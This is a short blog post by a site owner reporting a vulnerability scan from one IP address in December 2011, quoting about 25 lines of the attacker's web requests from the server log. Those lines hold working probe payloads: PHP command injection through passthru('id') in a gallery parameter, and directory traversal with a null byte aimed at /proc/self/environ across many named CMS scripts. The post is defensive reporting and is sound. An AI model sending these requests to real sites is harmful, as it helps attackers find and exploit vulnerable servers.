58.63.241.209 knocking on the door.

I see a few visitors who are looking for weaknesses on most of my domains daily.
Usually a few lines like “admin/banner_manager.php/login.php” during a few seconds.
This one was a bit more “intense” than usual, +1100 lines in the log and it lasted for +13 minutes.
Coming from the IP 58.63.241.209 (China), looking for weaknesses to exploit, “proc/self/environ%00”.

I see Joomla clearly in there, but whether the rest of the hits are all related to Joomla, I don’t know.
I suspect this is an intended “box opener” looking for weaknesses in various possible installs, but I have very limited knowledge of this.

58.63.241.209 is known from before, see e.g. http://www.dshield.org/ipdetails.html?ip=58.63.241.209

The first few lines, see the attached .txt-file (.txt is now allowed?) .odt-file if you are interested in the rest.

[29/Dec/2011:04:06:48 -0500] "GET /pics/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:48 -0500] "GET /images/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:49 -0500] "GET /album/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:52 -0500] "GET /img/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:52 -0500] "GET /albums/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:52 -0500] "GET /photo/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /photos/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /photoalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /photoalbums/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /pic/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:54 -0500] "GET /catalog/shopping_cart.php?_ID=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:54 -0500] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:55 -0500] "GET /include/new-visitor.inc.php?lvc_include_dir=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:55 -0500] "GET /_functions.php?prefix=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:56 -0500] "GET /cpcommerce/_functions.php?prefix=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /modules/agendax/addevent.inc.php?agendax_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /ashnews.php?pathtoashnews=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /eblog/blog.inc.php?xoopsConfig[xoops_url]=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:58 -0500] "GET /pm/lib.inc.php?pm_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:58 -0500] "GET /b2-tools/gm-2-b2.php?b2inc=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:58 -0500] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:59 -0500] "GET /modules/agendax/addevent.inc.php?agendax_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:59 -0500] "GET /includes/include_once.php?include_file=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:07:00 -0500] "GET /e107/e107_handlers/secure_img_render.php?p=../../../../../../../proc/self/environ%00

58.0.0.0/7 was already in .htaccess.

Posted in hackers. Comments Off on 58.63.241.209 knocking on the door.